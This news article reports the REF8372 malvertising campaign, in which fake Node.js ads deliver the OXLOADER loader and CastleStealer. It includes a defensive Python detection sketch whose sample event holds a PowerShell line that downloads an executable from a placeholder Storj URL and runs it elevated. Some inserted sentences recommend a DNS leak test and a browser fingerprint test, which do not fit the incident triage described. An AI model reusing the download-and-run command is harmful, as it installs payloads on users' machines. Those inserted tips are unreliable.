2026-06-22 The Hacker News

OXLOADER Malware Uses Google Ads to Spread CastleStealer Infostealer

Tags: Malware, Phishing, Threat Intel

Elastic Security Labs has uncovered a new campaign, tracked as REF8372, that delivers the CastleStealer information-stealing malware through a previously undocumented loader called OXLOADER. The operation leverages malicious Google Ads as the initial attack vector, targeting users searching for terms such as "lts version of node.js." Clicking on these sponsored results redirects victims to a fraudulent website hosted at node-js[.]prentiva99[.]info, which impersonates the legitimate Node.js project. The ads were published under the verified advertiser name "ВОЛОДИМИР ТЕРЕЩЕНКО," purportedly a Ukraine-based entity, though it remains unclear whether the account was hijacked, purchased, or freshly created. Google removed the advertiser account and its associated campaigns on May 14, 2026. A WHOIS lookup of the rogue domain's registration history can help researchers trace ownership patterns common in similar fraud operations.

OXLOADER demonstrates a high level of engineering sophistication, employing multiple layers of obfuscation including control-flow flattening, opaque predicates, and Mixed Boolean-Arithmetic (MBA) techniques, alongside self-modifying decryption stubs that abuse the Windows .reloc section to stage shellcode. The infection chain begins with a batch script hosted on Storj, a decentralized cloud storage platform that the threat actor abuses to bypass domain-based reputation filters. Execution displays a fake installation wizard UI while a PowerShell command silently retrieves the OXLOADER executable from Storj and runs it with -Verb RunAs to obtain elevation through User Account Control. The loader then uses DLL side-loading to launch a rogue DLL that decrypts and injects the CastleStealer payload. During incident triage, defenders can combine a DNS leak test with a review of DNS resolutions and outbound connections to identify unauthorized traffic to Storj or other suspicious infrastructure.
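As an added illustration (not Elastic's or The Hacker News' code), the following detection sketch flags the batch script → PowerShell → Storj download → -Verb RunAs chain described above in constructed process-creation events. The Storj gateway hostname, file names and paths are assumed placeholders, since the article names the platform but not the URL.

```python
"""Detection sketch for the OXLOADER delivery chain (added example).

Events are constructed, Sysmon-like process-creation records, not real
telemetry; the Storj URL and file paths are assumed placeholders.
"""
import re

# Constructed sample events (parent -> child). Only pid 300 matches the chain.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "cmd.exe",
     "cmdline": 'cmd.exe /c "C:\\Users\\victim\\Downloads\\node-lts-installer.bat"'},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": ("powershell.exe -w hidden Invoke-WebRequest "
                 "https://link.storjshare.io/raw/EXAMPLE/setup.exe "  # assumed host
                 "-OutFile $env:TEMP\\setup.exe; "
                 "Start-Process $env:TEMP\\setup.exe -Verb RunAs")},
    {"pid": 400, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Process"},  # benign control case
]

STORJ_URL = re.compile(r"https?://\S*storjshare\.io/", re.I)  # assumed gateway
RUNAS = re.compile(r"-Verb\s+RunAs", re.I)
DOWNLOAD = re.compile(r"Invoke-WebRequest|Invoke-RestMethod|DownloadFile|"
                      r"curl\.exe|certutil", re.I)


def score_event(event, by_pid):
    """Return the list of chain signals present for one PowerShell event."""
    parent = by_pid.get(event["ppid"])
    cmdline = event["cmdline"]
    reasons = []
    # Parent is cmd.exe running a .bat file: the dropper stage in the article.
    if parent and parent["image"].lower() == "cmd.exe" \
            and ".bat" in parent["cmdline"].lower():
        reasons.append("spawned_by_batch")
    if DOWNLOAD.search(cmdline):
        reasons.append("download_cmdlet")
    if STORJ_URL.search(cmdline):
        reasons.append("storj_url")
    if RUNAS.search(cmdline):
        reasons.append("runas_elevation")
    return reasons


def find_oxloader_chain(events, min_signals=3):
    """Return (pid, reasons) for PowerShell events with enough chain signals."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        reasons = score_event(e, by_pid)
        if len(reasons) >= min_signals:
            hits.append((e["pid"], reasons))
    return hits
```

Requiring several signals at once keeps a lone `-Verb RunAs` or a legitimate Storj download from firing on its own.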

CastleStealer is a .NET-based stealer previously observed alongside CastleLoader in the BackgroundFix campaign, which used ClickFix-style lures disguised as a free image-editing tool. That earlier activity was attributed to the threat cluster GrayBravo, and analysts are now assessing potential overlap with REF8372. OXLOADER also incorporates anti-VM checks and benign-looking code padding to evade sandbox analysis, contributing to a low detection rate across major antivirus engines. The threat actor appears to be Russian-speaking and financially motivated, as evidenced by built-in geographic exclusions that prevent infections in Commonwealth of Independent States countries. "OXLOADER is in an early operational phase, but the engineering behind it suggests this family is worth watching," Elastic Security Labs researchers Daniel Stepanic and Jia Yu Chan noted. Users concerned about exposure to similar malvertising campaigns can assess their browser's tracking surface with a browser fingerprint test and review their overall exposure with a broader privacy checkup.

Source: The Hacker News
